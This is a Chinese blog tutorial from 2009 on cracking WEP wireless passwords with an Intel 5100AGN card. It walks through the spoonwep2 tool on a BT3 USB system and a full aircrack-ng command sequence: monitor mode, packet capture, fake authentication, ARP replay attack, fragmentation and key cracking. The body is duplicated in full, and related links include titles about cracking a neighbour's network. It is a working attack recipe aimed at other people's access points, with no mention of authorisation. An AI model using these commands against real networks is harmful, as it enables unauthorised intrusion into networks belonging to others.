用Interl 5100AGN 无线网卡破解无线网络WEP密码
2009-11-02 09:38
477 查看
在这里我使用两种方法破解无线网络WEP密码:工具破解和命令行破解。
1、使用霸天虎Mini-BT3.6.1
下载霸天虎Mini-BT 3.6.1.ISO, 解压后,将boot、slax文件夹拷贝到已格式化的U盘中,在cmd提示符下输入U盘盘符,转到U盘目录下,再输入cd boot,接着输入bootinst,根据提示,一路按任意键即可,很快就将BT3系统安装到u盘了。
重启电脑,设置系统从U盘启动,进入系统后,开一个shell(在开始菜单右边),输入 airmon-ng start wlan0,这一步是打开网卡的监听模式。
启动spoonwep2破解工具(桌面上有在),窗口中有3个下拉选择框,第一个选上一步得知的mon0,第二个选normall,第三个选unknown victim,然后点next.
点击右上角的Lunch按钮,开始扫描周围的ap信号。
选择扫描出来的你想要破解的ap,一般要等Data值有了再点seletion ok 按钮。
在弹出的窗口中,有两个下拉框,第一个选二三四中模式中的一个,我选的是第二种模式,第二个下拉框中选第一个模式即可。然后点击Lunch,就开始破解了,一会就会看到窗口下方的数据开始增长了,刚开始可能比较慢,到后面会很快的,耐心等待,直到KEY FOUND,可能时间比较长,这和你所在位置的信号强度有关。注意破解的密码不含中括号和冒号。
2.在Ubuntu9.04下使用命令行破解
打开几个shell依此使用以下几个命令,很快就会破解。
1、sudo airmon-ng start wlan0
2、sudo airodump-ng -w 文件名 --ivs --channel 频道号 mon0
这一步是在mon0上打开监控台,“文件名”可以任意取,“频道号”是你要监听 的频道,也可以不要这一项。
3、sudo aireplay-ng -1 0 -a AP的MAC地址 -h 本机的MAC地址 mon0
这一步是建立网卡与待破解ap的伪连接,如果成功会提示连接成功。
4、sudo aireplay-ng -3 -b -a AP的MAC地址 -h 本机的MAC地址 mon0
这一步是对待破解AP进行-3 ARP攻击
5、sudo aireplay-ng -5 -b -a AP的MAC地址 -h 本机的MAC地址 mon0
这一步是进行抓包分析,主要是对-3进行辅助,我试过,如果没有这一步的话-3直接成功很困难。这一步运行不久后会提示你yes还是no,一律选yes后回车,会多次提示你,不管它,每次都选yes就行,直到步骤4狂刷屏与步骤2中的date值暴涨为止就可以不用管这一步了。
6、sudo aircrack-ng *.ivs ( *前有空格)
这一步是破解当前所有ivs文件,在出来的选项里选择待破解的AP对应的序号即可,很快密码就会出来。
本文出自 “网之骄子” 博客,请务必保留此出处http://wzhjz.blog.51cto.com/683469/220654
1、使用霸天虎Mini-BT3.6.1
下载霸天虎Mini-BT 3.6.1.ISO, 解压后,将boot、slax文件夹拷贝到已格式化的U盘中,在cmd提示符下输入U盘盘符,转到U盘目录下,再输入cd boot,接着输入bootinst,根据提示,一路按任意键即可,很快就将BT3系统安装到u盘了。
重启电脑,设置系统从U盘启动,进入系统后,开一个shell(在开始菜单右边),输入 airmon-ng start wlan0,这一步是打开网卡的监听模式。
启动spoonwep2破解工具(桌面上有在),窗口中有3个下拉选择框,第一个选上一步得知的mon0,第二个选normall,第三个选unknown victim,然后点next.
点击右上角的Lunch按钮,开始扫描周围的ap信号。
选择扫描出来的你想要破解的ap,一般要等Data值有了再点seletion ok 按钮。
在弹出的窗口中,有两个下拉框,第一个选二三四中模式中的一个,我选的是第二种模式,第二个下拉框中选第一个模式即可。然后点击Lunch,就开始破解了,一会就会看到窗口下方的数据开始增长了,刚开始可能比较慢,到后面会很快的,耐心等待,直到KEY FOUND,可能时间比较长,这和你所在位置的信号强度有关。注意破解的密码不含中括号和冒号。
2.在Ubuntu9.04下使用命令行破解
打开几个shell依此使用以下几个命令,很快就会破解。
1、sudo airmon-ng start wlan0
2、sudo airodump-ng -w 文件名 --ivs --channel 频道号 mon0
这一步是在mon0上打开监控台,“文件名”可以任意取,“频道号”是你要监听 的频道,也可以不要这一项。
3、sudo aireplay-ng -1 0 -a AP的MAC地址 -h 本机的MAC地址 mon0
这一步是建立网卡与待破解ap的伪连接,如果成功会提示连接成功。
4、sudo aireplay-ng -3 -b -a AP的MAC地址 -h 本机的MAC地址 mon0
这一步是对待破解AP进行-3 ARP攻击
5、sudo aireplay-ng -5 -b -a AP的MAC地址 -h 本机的MAC地址 mon0
这一步是进行抓包分析,主要是对-3进行辅助,我试过,如果没有这一步的话-3直接成功很困难。这一步运行不久后会提示你yes还是no,一律选yes后回车,会多次提示你,不管它,每次都选yes就行,直到步骤4狂刷屏与步骤2中的date值暴涨为止就可以不用管这一步了。
6、sudo aircrack-ng *.ivs ( *前有空格)
这一步是破解当前所有ivs文件,在出来的选项里选择待破解的AP对应的序号即可,很快密码就会出来。
本文出自 “网之骄子” 博客,请务必保留此出处http://wzhjz.blog.51cto.com/683469/220654
相关文章推荐
- backtrack3(BT3) usb版 破解WEP无线网络密码详细步骤
- 从零开始,教你如何破解WEP、WPA无线网络 密码
- 简单用BT3破解无线网络WEP, WPA密码
- 使用笔记本无线网卡破解无线网络密码
- 破解无线网络WEP密码(上)
- backtrack3(BT3) usb版 破解WEP无线网络密码详细步骤
- 破解无线网络WEP密码(下)
- 简单用BT3破解无线网络WEP, WPA密码
- 简单用BT3破解无线网络WEP, WPA密码
- WEP无线网络密码破解
- 用BackTrack 5破解无线网络wep加密3分钟教程
- 买个无线网卡,破解邻居家网络
- 深入解析无线WEP和WPA密码及破解原理
- 2012破解无线网络密码教程
- 手把手教你如何破解无线网络密码(蹭网教程)
- 无线网络密码破解方法
- 无线网络破解________破解wap密码..............
- BT3破解WEP无线网络步骤整理
- BT3(虚拟机中)破解无线网络wep密钥
- 无线网络破解________破解wap密码..............